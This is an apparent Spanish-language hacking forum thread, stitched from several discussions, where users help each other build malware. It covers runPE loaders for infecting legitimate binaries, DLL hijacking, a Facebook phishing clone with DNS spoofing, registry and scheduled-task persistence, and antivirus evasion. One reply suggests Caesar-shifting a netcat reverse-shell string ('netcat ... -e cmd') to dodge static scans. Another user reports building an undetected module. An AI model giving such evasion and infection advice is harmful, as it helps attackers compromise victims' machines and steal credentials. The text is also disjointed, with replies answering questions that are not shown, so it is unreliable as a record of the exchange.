Mensajes

Vi a uno de estos pseudohackers de youtube en un video haciendo runPE y cuando terminó de escribir el código cambió el nombre de todas las variables por caractéres chinos, eso sirve para algo?

Saludos camaradas!

Sobre la segunda opción, has de escribir el binario original como recurso embebido Después, al ejecutar el binario infectado, tendrás que cargar el binario original mediante un loader PE (runPE). Hay tropecientos en internet. Es decir binario_infectado > realizas X acciones maliciosas > cargas la imagen PE original en runtime > se ejecuta el binario original.

Esta técnica es conocida por el problema del árbol de dependencias. No es algo que yo haya estudiado a fondo pero si practicado. El problema es el siguiente, el OS Windows tiene una whitelist de las DLLs conocidas, por lo tanto si incluyo por ejemplo USER32.DLL en la carpeta del binario no va a llamar a esa DLL sino la que está en system32. En cambio, si la DLL no esta whitelisteada en el registro (regedit, clave KnownDLLs creo recordar) entonces TODO DEPENDE de como se haya programado la aplicación.

Si el binario tiene LoadLibrary("xxx.dll") y esa DLL está en otro directorio por ejemplo system32 si insterto una dll que se llame xxx.dll en el directorio del binario primero cargará la del WorkingDirectory, es decir la maliciosa. En cambio si hace LoadLibrary("C:\\Windows\\System32\\xxx.dll") va directamente al directorio system32 y escoge la .dll original.

Espero se entienda. Saludos.

Se entendió perfectamente y me iluminaste un poco más.

Muchas gracias!

Bueno, no soy experto. Tengo entendido que lo que se hace habitualmente es intentar suplantar la identidad de una entidad reconocida. Por ejemplo, podrías hacer un clon de la portada de facebook y hospedarla en un host.

Además, sé que lo que suelen hacer es usar SSL para que el sitio parezca seguro.

Llevandolo a otro nivel, tengo entendido que si estás en la red de la victima podrías suplantar la identidad utilizando el dominio de la identidad que estás suplantando.
https://en.wikipedia.org/wiki/DNS_spoofing

Por ejemplo:
La IP de facebook es: 1.2.3
LA tuya es: 4.5.6
La victima entra a www.facebook.com y el web server de facebook responde desde 1.2.3
cuando vos suplantas la identidad el webserver que respondería seria 4.5.6
de esta forma a los ojos del tipo no existe diferencia entre facebook y vos.

No recuerdo el nombre de la técnica, espero alguno de los miembros del foro puedan nutrir esto que dije o brindarte mejor y/o más información.

Bien, tengo una pregunta por método mencionado:

1. Lo de startup suena muy fácil, es más fácil de detectar cierto? Imagino que deben haber miles de malwares desarrollados por noobs como yo que agreguen un registro en /Run o usen schtasks.exe (Tareas programadas).

2.

Otra es infectar binarios legítimos para arrancar desde ahí (coges el binario lo vuelcas en memoria, mezclas con tu binario, dejas los iconos/recursos como estaban y listo).

Esto lo hago con OllyDbg? Agarro mi binario, abro el otro binario y le meto el mío? Imagino que luego tengo que cambiar de alguna forma el Entry Point para que salte a la posición de memoria donde está mi programa.

3. Voy a buscar por mi cuenta, si tenes alguna documentación de dllhijacking estaría agradecido.

Información de valor, muchas gracias. Mañana me creo el entorno y comienzo a peobar

Lamento decirte que si no instalaste algo previamente para poder rastrearlo... estás muy complicado.. a no ser que tengas contactos en la NSA o seas amigo de el dueño de la empresa de telefónica, como para hacer una triangulación.

Ve modificando el código para saber que es exactamente lo que salta y modifica esos trozos para hacer lo mismo de otra forma. O tira de debugger. A veces con una simple ofuscación basta. Muchos av son prácticamente solo análisis stático. Te miran el binario y si encuentran strings como "netcat 123.123.12 -e cmd" ya te saltan. Le pasas un cesar y listo. "ofudbu 123.123.12 -f dne". Es probable que incluso encuentren similitudes con hashes de otros malware creados por otros de forma similar y que tienen en la base de datos.

Mañana me armo la máquina virtual tal como me recomendaste, es como decís, es cuestión de jugar un poco.

Gracias Manolo

Te fuiste a la ***** con la respuesta, muy buena! Gracias jaja ahora me voy a poner a investigar un poco más al respecto a algunos términos que desconocía

Un gran saludo!

PD: Justo te había escrito por Twitter!

Saludos

Buenas, alguna documentación sobre métodos o mecanismos de persistencia para malware? Logré desarrollar un módulo FUD pero cuando agrego la línea para editar el registro de Startup me lo detecta.

Tiene documentación? Algún mecanismo que pueda estudiar o algo similar?

agradezco la data!

Saludos

Los av son para detectar malware popular. Muchos av hacen hashes, con que no hagas copia y pega en la mayoría no te detectan nada. A veces te detecta más por el propio packer que por el malware en sí.

Real, lo verifiqué el otro día. Hice una app de consola que tenía dos lineas (creaban un regisstro de windows)

La corrí en virus total y no la detectaba nadie, le pasé el packer y chau.. los packers, crypters públicos no sirven para nada, habrá que ponerse a programar uno que haga cosas diferentes.. de todas maneras las llamadas a las diferentes API parece que no se pueden esconder, Windows Defender me está haciendo la vida imposible.

Estoy intentando encontrarle la vuelta.. claramente con ingeniería social eso está resuelto, la gente con tal de usar un programa te desactiva todo.. pero no es la idea